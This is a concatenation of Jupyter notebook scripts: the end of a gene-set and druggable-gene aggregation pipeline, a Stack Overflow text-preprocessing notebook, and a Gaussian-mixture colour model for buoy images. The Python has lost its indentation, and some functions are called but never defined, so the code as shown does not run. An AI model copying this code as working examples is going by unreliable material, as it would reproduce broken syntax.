# geneSetTable=read.txt(gseaMetaNonEmpty $fn[i], fill=T, comment.char="", quote="",
# skip= firstLineOfGeneSetTable-1,
# nrows= lastLineOfGeneSetTable -firstLineOfGeneSetTable)
# # geneSetTable= allGseaInfo[(1+firstLineOfGeneSetTable): lastLineOfGeneSetTable,1:7]
# colnames(geneSetTable)=gsub(" ", "_", c("GeneSetName", "N Genes in Gene Set (K)",
# "Description", "N Genes in Overlap (k)",
# "k/K", "p-value", "FDR q-value"))
# # dput(as.character(allGseaInfo[firstLineOfGeneSetTable,1:7]))
#
# gseaGeneSetListRaw[[i]]= geneSetTable
# names(gseaGeneSetListRaw[i])= gseaMetaNonEmpty $fileID[i]
# }
#
#
# ###
# ### create a table listing all reported gene sets and identify which ThGeneLists
# ### they're enriched in
# ###
#
# names(gseaGeneSetListRaw)= gseaMetaNonEmpty$dataTag
#
# gseaEnrichedGeneSetsList=lapply(gseaGeneSetListRaw, function(x) unique(x$GeneSetName))
#
# gseaEnrichedGeneSetsByThGeneList=Reduce(
# "rbind",lapply(1:nrow(gseaMetaNonEmpty),
# function(x) data.frame(
# GeneSet= gseaEnrichedGeneSetsList[[x]],
# sampleName= gseaMetaNonEmpty $sampleName[x] ,
# dataTag = gseaMetaNonEmpty $dataTag[x])))
#
# gseaEnrichedGeneSetsByThGeneList$dataTag=
# paste0("enriched_in_", gseaEnrichedGeneSetsByThGeneList$dataTag)
#
# enrichedGeneSet=dcast(
# gseaEnrichedGeneSetsByThGeneList[,c("GeneSet", "sampleName", "dataTag")],
# GeneSet ~ dataTag, value.var="sampleName", fun.aggregate=length)
#
# # add cols when nothing in list is enriched, e.g. "enriched_in_pc_up"
# expectedThGeneSetsWithGeneSetAnalysis=c("comm_up", "pc_up", "pd_up", "top5")
# enrichedColsToAdd=! paste0(
# "enriched_in_", expectedThGeneSetsWithGeneSetAnalysis) %in% colnames(enrichedGeneSet)
# if (sum(enrichedColsToAdd)>0){
# emptyEnrichedToAdd= data.frame(
# matrix(, ncol=sum(enrichedColsToAdd), nrow=nrow(enrichedGeneSet), data=0))
# colnames(emptyEnrichedToAdd)=paste0(
# "enriched_in_", expectedThGeneSetsWithGeneSetAnalysis[enrichedColsToAdd])
#
# allColEnrichedGeneSet=cbind(enrichedGeneSet, emptyEnrichedToAdd)
# allColEnrichedGeneSet= allColEnrichedGeneSet[
# , c("GeneSet", paste0("enriched_in_", expectedThGeneSetsWithGeneSetAnalysis))]
# } else {
# allColEnrichedGeneSet= enrichedGeneSet
# }
#
# # add overlap_genes cols
# tempAdd= data.frame(matrix(, ncol=ncol(allColEnrichedGeneSet)-1,
# nrow=nrow(allColEnrichedGeneSet)))
# colnames(tempAdd)=gsub("enriched", "overlap_genes",
# colnames(allColEnrichedGeneSet[2:ncol(allColEnrichedGeneSet)]))
#
# fullEnrichedGeneSet=cbind(allColEnrichedGeneSet, tempAdd)
#
# fullEnrichedGeneSet $totalThListsEnriched=rowSums(
# as.matrix(fullEnrichedGeneSet[, grepl("enriched_in", colnames(fullEnrichedGeneSet ))]))
#
# fullEnrichedGeneSet = fullEnrichedGeneSet[
# order(fullEnrichedGeneSet $totalThListsEnriched, decreasing=TRUE),]
#
#
# ###
# ### identify gene sets that contain druggable genes
# ###
# fullEnrichedGeneSet$enrichedSetContainsDruggableGene=NA
# fullEnrichedGeneSet$anySetContainsDruggableGene=NA
# druggableGeneList= subset(geneByThGeneList, druggableGene )$gene
# # ThSetEnrichedCols=grep("enriched_in", colnames(fullEnrichedGeneSet), value=TRUE)
# ThGeneListEnrichedCols=grep("enriched_in", colnames(fullEnrichedGeneSet), value=TRUE)
# ThGeneListNamesFromCols=gsub("enriched_in_", "", ThGeneListEnrichedCols)
# # ThSetNamesFromCols=gsub("enriched_in_", "", ThSetEnrichedCols)
# # ThSet_inSetCols=grep("inSet_", colnames(geneByThGeneList), value=TRUE)
# # ThSetNamesFrom_inSetCols=gsub("inSet_", "", ThSet_inSetCols)
# ThGeneList_inSetCols =gsub("enriched_in_", "inSet_", ThGeneListEnrichedCols)
# ThSetEnrichedCols=grep("enriched_in", colnames(fullEnrichedGeneSet), value=TRUE)
#
# ThGeneListNamesFrom_inSetCols=gsub("inSet_", "", ThGeneList_inSetCols)
#
#
# for (i in 1:nrow(fullEnrichedGeneSet)){
# # i=1
# thisGs=fullEnrichedGeneSet$GeneSet[i]
# enrichedInThGeneList= ThGeneListNamesFromCols [
# fullEnrichedGeneSet [i,ThGeneListEnrichedCols]==1]
# genesInThisPathway=subset(allPathwaysDF, GeneSet== thisGs)$Gene
# druggableGenesInThisPathway=subset(
# allPathwaysDF, GeneSet== thisGs & Gene %in% druggableGeneList)$Gene
# if (length(druggableGenesInThisPathway)!=0){
# fullEnrichedGeneSet$anySetContainsDruggableGene[i]=TRUE
# # test whether those genes are in a list with this gene set enriched
# anyDruggableGenePresentInset= ThGeneListNamesFrom_inSetCols [colSums(as.matrix(
# subset(geneByThGeneList,
# gene %in% druggableGenesInThisPathway)[, ThGeneList_inSetCols]))>0]
#
# # for each GSEA gene set, get the list of genes overlapping with each ThLists
# theseGenesByThGeneList=subset(geneByThGeneList, gene %in% genesInThisPathway)
# setsWithGenesInPathway= ThGeneList_inSetCols [colSums(as.matrix(
# theseGenesByThGeneList[, ThGeneList_inSetCols]))>0]
# genesInPathways=unlist(lapply(
# setsWithGenesInPathway,
# function(x) paste(
# theseGenesByThGeneList$gene[as.logical(theseGenesByThGeneList[, x])],
# collapse=",")))
# fullEnrichedGeneSet[i, gsub("inSet", "overlap_genes_in", setsWithGenesInPathway)]=
# genesInPathways
#
# if (length(intersect(enrichedInThGeneList, anyDruggableGenePresentInset))>0){
# fullEnrichedGeneSet$enrichedSetContainsDruggableGene[i]=TRUE
# }
# } else { # remove this pathway from enriched pathways since it's not druggable.
# fullEnrichedGeneSet$anySetContainsDruggableGene[i]=FALSE
# fullEnrichedGeneSet$enrichedSetContainsDruggableGene[i]=FALSE
# }
# }
#
#
# fullEnrichedGeneSetWithDruggableThListGene=subset(
# fullEnrichedGeneSet,
# anySetContainsDruggableGene)[, grep("anySetContainsDruggableGene",
# colnames(fullEnrichedGeneSet),
# invert=TRUE, value=TRUE)]
#
# ### MAKE mega table
#
# system.time(genesInGeneSets<-merge(
# allPathwaysDF, geneByThGeneList, by.x="Gene", by.y="gene"))
#
# colnames(genesInGeneSets)=gsub("inSet_", "geneInSet_", colnames(genesInGeneSets))
#
# megaTable=merge(genesInGeneSets, fullEnrichedGeneSet, by="GeneSet")
#
# colnames(megaTable)=gsub("enriched_in_", "pathwayEnrichedInSet_", colnames(megaTable))
#
# megaTable$sumForRanking= rowSums(
# as.matrix(megaTable[,c("thListsContainingGene", "totalThListsEnriched")], na.rm=TRUE))
#
# megaTable= megaTable[order(megaTable$sumForRanking),]
#
#
# genesInThListsByGeneSets<-NULL
# for (i in 1:nrow(fullEnrichedGeneSet)){
# #i=1
# thisGs=enrichedGeneSet$GeneSet[i]
# # dim(subset(megaTable, GeneSet==thisGs));
# #length(unique(subset(megaTable, GeneSet==thisGs)$Gene))
# genesInThListsByGeneSets=rbind(
# genesInThListsByGeneSets,
# data.frame(geneSet= thisGs,
# countInThLists=length(unique(subset(megaTable, GeneSet==thisGs)$Gene))))
# }
#
# ###
# ### Gene set overview and drug lists
# ###
#
# # add gene-specific information to gene set list
# fullEnrichedGeneSetWithDruggableThListGene$druggableGenesInThLists=
# unlist(lapply(fullEnrichedGeneSetWithDruggableThListGene $GeneSet,
# function(thisGs) paste(
# unique(subset(genesInGeneSets,
# GeneSet %in% thisGs & druggableGene)$Gene),
# collapse=", ")))
#
#
# fullEnrichedGeneSetWithDruggableThListGene$allMemberGenesInThLists=
# unlist(lapply(fullEnrichedGeneSetWithDruggableThListGene $GeneSet,
# function(thisGs) paste(unique(subset(genesInGeneSets,
# GeneSet %in% thisGs)$Gene),
# collapse=", ")))
#
#
# fullEnrichedGeneSetWithDruggableThListGene $drugs=
# unlist(lapply(fullEnrichedGeneSetWithDruggableThListGene $GeneSet,
# function(x) paste(
# unique(subset(dgDataInteractions,
# gene %in% subset(genesInGeneSets,
# GeneSet ==x)$Gene)$drug),
# collapse=", ")))
#
# fullEnrichedGeneSetWithDruggableThListGene$druggableGeneWithDrug =
# unlist(lapply(fullEnrichedGeneSetWithDruggableThListGene $GeneSet,
# function(x) paste(
# unique(subset(dgDataInteractions, gene %in% subset(
# genesInGeneSets, GeneSet ==x)$Gene)$rawInteraction),
# collapse=", ")))
#
# write.txt(fullEnrichedGeneSetWithDruggableThListGene, file=paste(geneSetAggFilename))
#
# # druggable pathways
# dp=unique(megaTable[,c("GeneSet", "druggableGene")])
# druggableGeneSets=subset(dp, druggableGene)$GeneSet
#
# megaTable$druggablePathway= megaTable $GeneSet %in% druggableGeneSets
#
# dim(subset(megaTable, druggablePathway))
#
# ###
# ### Geneset TABLES
# ###
#
# commonGSEAcolsDF=unique(
# Reduce("rbind",lapply(
# gseaGeneSetListRaw,
# function(x) unique(x[,c("GeneSetName", "N_Genes_in_Gene_Set_(K)",
# "Description")]))))
#
# multiListGeneSets<-commonGSEAcolsDF
#
#
# ## add support for values not present in gseaMetaNonEmpty
# # for (i in 1:nrow(gseaMetaNonEmpty)){
# for (i in 1:nrow(gseaMeta)){
# thisDataTag=gseaMeta$dataTag[i]
# if (thisDataTag %in% names(gseaGeneSetListRaw)){
# thisWide= gseaGeneSetListRaw[[thisDataTag]]
# colnames(thisWide)[4:7]=paste0(thisDataTag, "_", colnames(thisWide)[4:7])
# multiListGeneSets =merge(multiListGeneSets,
# thisWide[,c(1,4:7)], by="GeneSetName", all=TRUE)
# } else {
# genericColNames= colnames(gseaGeneSetListRaw[[1]][,4:7])
# emptyColsToAdd= data.frame(matrix(, ncol=length(genericColNames),
# nrow=nrow(multiListGeneSets)))
# colnames(emptyColsToAdd)=paste0(thisDataTag, "_", genericColNames)
# multiListGeneSets =cbind(multiListGeneSets, emptyColsToAdd)
# }
# }
#
#
# # add contains druggable gene found in one gene list
# write.txt(multiListGeneSets, file=paste(geneSetDetailsFilename))
#
#
# ###
# ### create linh's overview
# ###
# colsToSkip=3
#
# pancanUp=geneByThGeneList[geneByThGeneList $inSet_pc_up==1,]$gene
# pancanDown=geneByThGeneList[geneByThGeneList $inSet_pc_down==1,]$gene
# pandiseaseUp=geneByThGeneList[geneByThGeneList $inSet_pd_up==1,]$gene
# pandiseaseDown=geneByThGeneList[geneByThGeneList $inSet_pd_down==1,]$gene
# top5=geneByThGeneList[geneByThGeneList $inSet_top5==1,]$gene
# pcdUp=intersect(pancanUp, pandiseaseUp)
# pcdDown=intersect(pancanDown, pandiseaseDown)
#
# pancanUp_DGIdb=unique(subset(dgDataInteractions, gene %in% pancanUp)$rawInteraction)
# pandiseaseUp_DGIdb=unique(subset(dgDataInteractions, gene %in% pandiseaseUp)$rawInteraction)
# pcdUp_DGIdb=unique(subset(dgDataInteractions, gene %in% pcdUp)$rawInteraction)
# top5_DGIdb=unique(subset(dgDataInteractions, gene %in% top5)$rawInteraction)
#
# colnames_pc=c("Pan-cancer Up", "Pan-cancer Down", "DGIDB", "TARGET", "GSEA", "k/K", "FDR")
# colnames_pcd= colnames_pc
# colnames_pcd[1:2]=c("PCD Up", "PCD Down")
# colnames_pd= colnames_pc
# colnames_pd[1:2]=c("Pan-disease Up", "Pan-disease Down")
# colnames_top5= colnames_pc[-2]
# colnames_top5[1]=c("top5")
#
# colnameList=list(colnames_pc, colnames_pcd, colnames_pd, colnames_top5)
#
# overviewlist=list(pancanUp, pancanDown, pancanUp_DGIdb, pcdUp, pcdDown, pcdUp_DGIdb,
# pandiseaseUp, pandiseaseDown, pandiseaseUp_DGIdb, top5, top5_DGIdb)
#
# overviewDF=data.frame(matrix(data="", nrow=1+max(sapply(overviewlist, length)),
# ncol=length(overviewlist)))
#
# for (i in 1:length(overviewlist)){
# thisText=overviewlist[[i]]
# if (length(thisText)>0) overviewDF[2:(1+length(thisText)),i]= thisText
# }
# overviewDF[1,]= c(colnames_pc[1:3], colnames_pcd[1:3], colnames_pd[1:3],
# colnames_top5[1:2])
#
# overviewDF2=data.frame(matrix(data="", nrow=1+max(sapply(overviewlist, length)),
# ncol=length(unlist(colnameList))+3* colsToSkip))
# overviewDF2[1,]= c(colnames_pc, rep("", colsToSkip), colnames_pcd, rep("", colsToSkip),
# colnames_pd, rep("", colsToSkip), colnames_top5)
#
# overviewDF2[,1:3]= overviewDF[,1:3] # pc
# overviewDF2[,11:13]= overviewDF[,4:6] # pd
# overviewDF2[,21:23]= overviewDF[,7:9] # pcd
# overviewDF2[,31:32]= overviewDF[,10:11] # top5
#
#
# ###
# ### prioritized druggable genes
# ###
#
# # broadest list
#
# prioritizedDruggableGenes=druggableGeneByThGeneList
#
#
#
# # candidate genes are:
# # upoutlier or top five percent (not down outlier) genes marked druggable by dgidb
#
# # consider whether the list is (yes/no)
# # in pancan up outliers
# # in pandisease up outliers
#
# #
# # names of gene-containing pathways that are enriched in a treehouse gene set
# # (like pancan up outliers or pandisease up outliers)
# #
# pathwayByEnrichedList=lapply(ThSetEnrichedCols, function(ei) unlist(
# lapply(prioritizedDruggableGenes$druggableGene,
# function(x) paste(
# subset(allPathwaysDF,
# Gene ==x &
# GeneSet %in% fullEnrichedGeneSetWithDruggableThListGene$GeneSet[
# fullEnrichedGeneSetWithDruggableThListGene[,ei]==1])$GeneSet,
# collapse=","))))
#
# # namesOfEnrichedPathways=data.frame(t(cbindList(pathwayByEnrichedList)))
# #namesOfEnrichedPathways =data.frame(t(Reduce("cbind", pathwayByEnrichedList)),
# # row.names=NULL)
# namesOfEnrichedPathways=data.frame(Reduce("cbind", pathwayByEnrichedList))
#
# colnames(namesOfEnrichedPathways)= ThSetEnrichedCols
#
# #
# # count of gene-containing pathways that are enriched in a treehouse gene set
# # (like pancan up outliers or pandisease up outliers)
# #
# pathwayCountByEnrichedList=lapply(
# ThSetEnrichedCols,
# function(ei) unlist(lapply(
# prioritizedDruggableGenes$druggableGene,
# function(x) length(
# subset(allPathwaysDF,
# Gene ==x &
# GeneSet %in% fullEnrichedGeneSetWithDruggableThListGene$GeneSet[
# fullEnrichedGeneSetWithDruggableThListGene[,ei]==1])$GeneSet))))
#
# countsOfEnrichedPathways=data.frame(Reduce("cbind", pathwayCountByEnrichedList))
# colnames(countsOfEnrichedPathways)=paste0("count_of_", ThSetEnrichedCols)
#
# prioritizedDruggableGenesWithPathwayAndCount=cbind(
# prioritizedDruggableGenes, cbind(
# namesOfEnrichedPathways,
# countsOfEnrichedPathways)[,c(rbind(ThSetEnrichedCols,
# paste0("count_of_", ThSetEnrichedCols)))])
#
#
# # all enriched pathways
# prioritizedDruggableGenesCorrespondingPathways =lapply(
# prioritizedDruggableGenes$druggableGene, function(x) subset(
# allPathwaysDF,
# Gene ==x & GeneSet %in% fullEnrichedGeneSetWithDruggableThListGene$GeneSet))
#
# prioritizedDruggableGenesWithPathwayAndCount$allEnrichedPathways=unlist(lapply(
# prioritizedDruggableGenesCorrespondingPathways,
# function(x) paste(x$GeneSet, collapse=",")))
#
# prioritizedDruggableGenesWithPathwayAndCount $countOfAllEnrichedPathways=unlist(lapply(
# prioritizedDruggableGenesCorrespondingPathways, function(x) length(x$GeneSet)))
#
#
# # is in a pathways that is enriched in the same treehouse gene sets the gene is in
# # (like pancan up outliers or pandisease up outliers)
#
#
#
# # a drug corresponding to the gene has been recommended before
#
# # a drug corresponding to the gene has been recommended for a sample with one of the
# # diseases identified by tumor map
#
# # is gene an up-pancan outlier because of tissue signal? e.g. is it a btk/flt3 in AML,
# # in brain tumor, NGF -- (gain a point -- not explained by tissue specificity
# # e.g. 129
#
#
# # sheet format:
# # add to druggable genes
# # drug-containing pathways that are enriched only in pancancer
# # drug-containing pathways that are enriched only in pandisease
# # drug-containing pathways that are enriched in both pandisease and pancancer
#
#
#
# ###
# ### write amalgam excel workbook
# ###
#
# xlsxInputList=list(overview=overviewDF2,
# GeneSetDetailsPerList= multiListGeneSets,
# GeneSetAggregation= fullEnrichedGeneSetWithDruggableThListGene,
# druggableGeneAggregation= prioritizedDruggableGenesWithPathwayAndCount,
# allGeneAggregation= geneByThGeneList)
# names(xlsxInputList)[1]=paste(sampleID, "overview")
#
# write.txt(prioritizedDruggableGenesWithPathwayAndCount, file=druggableGeneAggFilename)
#
# write.xlsx(xlsxInputList,xlF, colNames=c(F, rep(T, length(xlsxInputList)-1)))
#
# # is it in a treehouse gene list (pcup or pcdown) an enriched pathways
#
# # is the drug target in that's enriched enriched in a pathways in gene list
#
# # in the druggable gene list, find drugs that are in both pdUp and pcUp
# # druggableGeneByThGeneList
#
# # if it's a drug we've recommended before that's good
#
# # if it's a drug we've recommended before
#
# # a drug corresponding to the gene has been recommended before
#
# # a drug corresponding to the gene has been recommended for a sample with this disease before
# }
#
# #### Main ####
#
# args<-commandArgs(TRUE)
#
# sample.id<-args[1]
# data.base.dir<-args[2]
# pathway.file<-args[3]
# allgene.agg<-args[4]
# druggene.agg<-args[5]
# geneset.agg<-args[6]
# geneset.dets<-args[7]
# xlsx.filename<-args[8]
#
# combine.gsea.dgidb(sample.id, data.base.dir, pathway.file,
# allgene.agg, druggene.agg, geneset.agg, geneset.dets, xlsx.filename
# )
# + [markdown] deletable=true editable=true
# Move the newly generated files back to the sampledir from the tmpdir.
# + deletable=true editable=true
# !pwd
for output_file in [all_gene, drug_gene, geneset_agg, geneset_details, xlsx_path]:
src_path = os.path.join(workdir, output_file)
print("Moving {} to {}".format(src_path, output_file))
os.rename(src_path, output_file)
# + [markdown] deletable=true editable=true
# Aggregate the newly generated files (except for the Excel file) into the json output and save it to a file. Load them as OrderedDicts to preserve column order, with dtype str
# to preserve exact contents (eg don't translate TRUE to a bool), and na_filter=False to avoid
# translating Rscript's "NA"s to null or empty string.
# + deletable=true editable=true
j["all_gene_aggregation"] = json.loads(
pd.read_csv(all_gene, delimiter="\t", index_col="gene", dtype="str", na_filter=False
).to_json(orient="columns"),object_pairs_hook=OrderedDict)
j["druggable_gene_aggregation"] = json.loads(
pd.read_csv(drug_gene, delimiter="\t", index_col="druggableGene", dtype="str",
na_filter=False).to_json(orient="columns"), object_pairs_hook=OrderedDict)
j["gene_set_aggregation"] = json.loads(
pd.read_csv(geneset_agg, delimiter="\t", index_col="GeneSet", dtype="str", na_filter=False
).to_json(orient="columns"), object_pairs_hook=OrderedDict)
j["gene_set_details_per_list"] = json.loads(
pd.read_csv(geneset_details, delimiter="\t", index_col="GeneSetName", dtype="str",
na_filter=False).to_json(orient="columns"), object_pairs_hook=OrderedDict)
with open(c["json"]["7"], "w") as jsonfile:
json.dump(j, jsonfile, indent=2)
# + [markdown] deletable=true editable=true
# Finally, delete the tmpfiles and tmpdir used. Iterate through the files in j5 as those are the tmpfiles created.
# + deletable=true editable=true
listtypemap = {"genelists" : "genes", "dgidb_results" : "dgidb", "gsea_results" : "gsea"}
for listtype in j5:
for genelist in j5[listtype]:
lname = listtypemap[listtype]
tempf = os.path.join(workdir, "{}_{}_{}".format(lname, sample_id, genelist))
print("Deleting temp file {}".format(tempf))
os.remove(tempf)
print("Deleting temp dir {}".format(workdir))
os.rmdir(workdir)
# + deletable=true editable=true
logging.info("Step 7: Done!")
print("Done!")
|
care/7_make-xls.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
#import the bq_helper library to help in making API calls to big query and fetch information
import bq_helper
from bq_helper import BigQueryHelper
import os
#we need to set the google application credentials key, which is unique based on the service account.
os.environ["GOOGLE_APPLICATION_CREDENTIALS"]="key.json"
bq_assistant = BigQueryHelper("bigquery-public-data", "stackoverflow")
#we find out the questions answered by a particular user and save them as a dataframe
QUERY = "SELECT q.id, q.title, q.body, q.tags, a.body as answers, a.score FROM `bigquery-public-data.stackoverflow.posts_questions` AS q INNER JOIN `bigquery-public-data.stackoverflow.posts_answers` AS a ON q.id = a.parent_id WHERE q.tags LIKE '%python%' LIMIT 500000"
df = bq_assistant.query_to_pandas(QUERY)
# -
#output this dataframe as a csv file
df.to_csv('data/Original_data.csv')
#read the stored csv file which has information as displayed below
import pandas as pd
import numpy as np
import spacy
EN = spacy.load('en_core_web_sm')
df = pd.read_csv('data/Original_data.csv')
df = df.iloc[:,1:]
df.head()
print('Datebase shape:' + str(df.shape))
#we can see that there are no null values
df.isna().sum()
pd.__version__
# In order to construct a corpus, we grouped all the answers by concatenating them based on their common questions and tags. Moreover, we added the scores for each answer in order to get a collective score for an entire question
aggregations = {
'answers': lambda x: "\n".join(x) ,
'score': 'sum'
}
grouped = df.groupby(['id','title', 'body','tags'],as_index=False).agg(aggregations)
deduped_df = pd.DataFrame(grouped)
deduped_df.head()
# The following code block shows the result of combining answers and their scores
# +
print('Max score before: ')
print(np.max(df.score.values))
print('Max score after: ')
print(np.max(deduped_df.score.values))
# -
# A couple of helper functions for Text Preprocessing. The steps followed to process a piece of raw text are:
#
# 1. Convert raw text into tokens
# 2. Convert tokens to lower case
# 3. Remove punctuations
# 4. Remove Stopwords<br>
# Note: we skipped removal of numeric data since we felt it would remove precious contextual information. we also skipped a 'Stemming/Lemmatization' step because we did not want alter the domain specific terms used in our corpus and risk losing precious information
# +
import re
import nltk
import inflect
from nltk.corpus import stopwords
def tokenize_text(text):
"Apply tokenization using spacy to docstrings."
tokens = EN.tokenizer(text)
return [token.text.lower() for token in tokens if not token.is_space]
def to_lowercase(words):
"""Convert all characters to lowercase from list of tokenized words"""
new_words = []
for word in words:
new_word = word.lower()
new_words.append(new_word)
return new_words
def remove_punctuation(words):
"""Remove punctuation from list of tokenized words"""
new_words = []
for word in words:
new_word = re.sub(r'[^\w\s]', '', word)
if new_word != '':
new_words.append(new_word)
return new_words
def remove_stopwords(words):
"""Remove stop words from list of tokenized words"""
new_words = []
for word in words:
if word not in stopwords.words('english'):
new_words.append(word)
return new_words
def normalize(words):
words = to_lowercase(words)
words = remove_punctuation(words)
words = remove_stopwords(words)
return words
def tokenize_code(text):
"A very basic procedure for tokenizing code strings."
return RegexpTokenizer(r'\w+').tokenize(text)
def preprocess_text(text):
return ' '.join(normalize(tokenize_text(text)))
# +
from bs4 import BeautifulSoup
from textblob import TextBlob
title_list = []
content_list = []
url_list = []
comment_list = []
sentiment_polarity_list = []
sentiment_subjectivity_list = []
vote_list =[]
tag_list = []
corpus_list = []
for i, row in deduped_df.iterrows():
title_list.append(row.title) # Get question title
tag_list.append(row.tags) # Get question tags
# Questions
content = row.body
soup = BeautifulSoup(content, 'lxml')
if soup.code: soup.code.decompose() # Remove the code section
tag_p = soup.p
tag_pre = soup.pre
text = ''
if tag_p: text = text + tag_p.get_text()
if tag_pre: text = text + tag_pre.get_text()
content_list.append(str(row.title) + ' ' + str(text)) # Append title and question body data to the updated question body
url_list.append('https://stackoverflow.com/questions/' + str(row.id))
# Answers
content = row.answers
soup = BeautifulSoup(content, 'lxml')
if soup.code: soup.code.decompose()
tag_p = soup.p
tag_pre = soup.pre
text = ''
if tag_p: text = text + tag_p.get_text()
if tag_pre: text = text + tag_pre.get_text()
comment_list.append(text)
vote_list.append(row.score) # Append votes
corpus_list.append(content_list[-1] + ' ' + comment_list[-1]) # Combine the updated body and answers to make the corpus
sentiment = TextBlob(row.answers).sentiment
sentiment_polarity_list.append(sentiment.polarity)
sentiment_subjectivity_list.append(sentiment.subjectivity)
content_token_df = pd.DataFrame({'original_title': title_list, 'post_corpus': corpus_list, 'question_content': content_list, 'question_url': url_list, 'tags': tag_list, 'overall_scores':vote_list,'answers_content': comment_list, 'sentiment_polarity': sentiment_polarity_list, 'sentiment_subjectivity':sentiment_subjectivity_list})
# -
content_token_df.head()
# +
content_token_df.tags = content_token_df.tags.apply(lambda x: x.split('|')) # Convert raw text data of tags into lists
# Make a dictionary to count the frequencies for all tags
tag_freq_dict = {}
for tags in content_token_df.tags:
for tag in tags:
if tag not in tag_freq_dict:
tag_freq_dict[tag] = 0
else:
tag_freq_dict[tag] += 1
# -
# The plan is to filter only the data which contains at least one of most_common_tags
import heapq
most_common_tags = heapq.nlargest(20, tag_freq_dict, key=tag_freq_dict.get)
most_common_tags
final_indices = []
for i,tags in enumerate(content_token_df.tags.values.tolist()):
if len(set(tags).intersection(set(most_common_tags)))>1: # The minimum length for common tags should be 2 because 'python' is a common tag for all
final_indices.append(i)
final_data = content_token_df.iloc[final_indices]
# **Data Normalization**
# <br>
# 1. we created a separate column for the 'processed_title' because we wanted to preserve the original title because we wanted to serve the original titles in the web interface
# 2. we also normalized the numeric 'scores'
# +
import spacy
EN = spacy.load('en_core_web_sm')
# Preprocess text for 'question_body', 'post_corpus' and a new column 'processed_title'
final_data.question_content = final_data.question_content.apply(lambda x: preprocess_text(x))
final_data.post_corpus = final_data.post_corpus.apply(lambda x: preprocess_text(x))
final_data['processed_title'] = final_data.original_title.apply(lambda x: preprocess_text(x))
# Normalize numeric data for the scores
final_data.overall_scores = (final_data.overall_scores - final_data.overall_scores.mean()) / (final_data.overall_scores.max() - final_data.overall_scores.min())
# -
final_data.tags = final_data.tags.apply(lambda x: '|'.join(x)) # Combine the lists back into text data
final_data.drop(['answers_content'], axis=1) # Remove the answers_content columns because it is alreaady included in the corpus
|
preprocessing/preprocess_tags.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import cv2
import numpy as np
from matplotlib import pyplot as plt
import os
import math
import random
# +
images=[]
path = "/Data/Yellow/"
path=os.getcwd()+path
for image in os.listdir(path):
images.append(image)
random.seed(0)
random.shuffle(images)
l=len(images)
test_images=images[0:int(l*0.3)]
images=images[int(l*0.3):]
# -
im=cv2.imread("%s%s"%(path,'yellow58.jpg'))
plt.imshow(cv2.cvtColor(im,cv2.COLOR_BGR2RGB))
# ## AVG HISTOGRAM
# +
histb=np.zeros((256,1))
histg=np.zeros((256,1))
histr=np.zeros((256,1))
for image in images:
image = cv2.imread("%s%s"%(path,image))
b,g,r=cv2.split(image)
bv=np.ravel(b)
rv=np.ravel(r)
gv=np.ravel(g)
for i,col in enumerate(gv):
if(not(col>220 and bv[i]>220 and rv[i]>240)):
histg[col]+=1
histb[bv[i]]+=1
histr[rv[i]]+=1
histg=histg/len(images)
histr=histr/len(images)
histb=histb/len(images)
# -
plt.plot(histb,color = 'b')
plt.plot(histg,color = 'g')
plt.plot(histr,color = 'r')
plt.show()
# +
pixelb=[]
pixelg=[]
pixelr=[]
for image in images:
image = cv2.imread("%s%s"%(path,image))
b,g,r=cv2.split(image)
for i in range (b.shape[0]):
for j in range(b.shape[1]):
k=image[i,j]
if(not(k[0]>220 and k[2]>240 and k[1]>240)):
pixelb.append(b[i,j])
pixelg.append(g[i,j])
pixelr.append(r[i,j])
pb=np.array(pixelb)
pg=np.array(pixelg)
pr=np.array(pixelr)
# -
# ## GREEN CHANNEL
# +
n = 0
mean1 = 200
mean2 = 150
# mean3 = 230
std1 = 6
std2 = 6
# std3 = 10
# -
while (n != 50):
p1 = Probabilty(pg,mean1,std1)
p2 = Probabilty(pg, mean2, std2)
# p3 = Probabilty(pg, mean3, std3)
D=p1+ p2
b1=p1/D
b2=p2/D
# b3=p3/D
mean1=np.sum(b1*pg)/(np.sum(b1))
mean2=np.sum(b2*pg)/(np.sum(b2))
# mean3=np.sum(b3*pg)/(np.sum(b3))
std1=np.sqrt(np.sum(b1*np.square(pg-mean1))/np.sum(b1))
std2=np.sqrt(np.sum(b2*np.square(pg-mean2))/np.sum(b2))
# std3=np.sqrt(np.sum(b3*np.square(pg-mean3))/np.sum(b3))
n = n + 1
# +
meang1=mean1
meang2=mean2
# meang3=mean3
stdg1=std1
stdg2=std2
# stdg3=std3
print('final mean- ',mean1,mean2)
print('final strd- ',std1, std2)
# -
# ## RED CHANNEL
# +
n = 0
mean1 = 250
mean2 = 200
# mean3 = 190
std1 = 7
std2 = 7
# std3 = 10
# -
while (n != 50):
p1 = Probabilty(pr,mean1,std1)
p2 = Probabilty(pr, mean2, std2)
# p3 = Probabilty(pr, mean3, std3)
D=p1+ p2
b1=p1/D
b2=p2/D
# b3=p3/D
mean1=np.sum(b1*pr)/(np.sum(b1))
mean2=np.sum(b2*pr)/(np.sum(b2))
# mean3=np.sum(b3*pr)/(np.sum(b3))
std1=np.sqrt(np.sum(b1*np.square(pr-mean1))/np.sum(b1))
std2=np.sqrt(np.sum(b2*np.square(pr-mean2))/np.sum(b2))
# std3=np.sqrt(np.sum(b3*np.square(pr-mean3))/np.sum(b3))
n = n + 1
meanr1=mean1
meanr2=mean2
# meanr3=mean3
stdr1=std1
stdr2=std2
# stdr3=std3
print('final mean- ',mean1,mean2)
print('final strd- ',std1, std2)
# ## BLUE CHANNEL
# +
n = 0
mean1 = 120
mean2 = 150
# mean3 = 150
std1 = 10
std2 = 10
# std3 = 10
# -
while (n != 50):
p1 = Probabilty(pb,mean1,std1)
p2 = Probabilty(pb, mean2, std2)
# p3 = Probabilty(pb, mean3, std3)
D=p1+ p2
b1=p1/D
b2=p2/D
# b3=p3/D
mean1=np.sum(b1*pb)/(np.sum(b1))
mean2=np.sum(b2*pb)/(np.sum(b2))
# mean3=np.sum(b3*pb)/(np.sum(b3))
std1=np.sqrt(np.sum(b1*np.square(pb-mean1))/np.sum(b1))
std2=np.sqrt(np.sum(b2*np.square(pb-mean2))/np.sum(b2))
# std3=np.sqrt(np.sum(b3*np.square(pb-mean3))/np.sum(b3))
n = n + 1
meanb1=mean1
meanb2=mean2
# meanb3=mean3
stdb1=std1
stdb2=std2
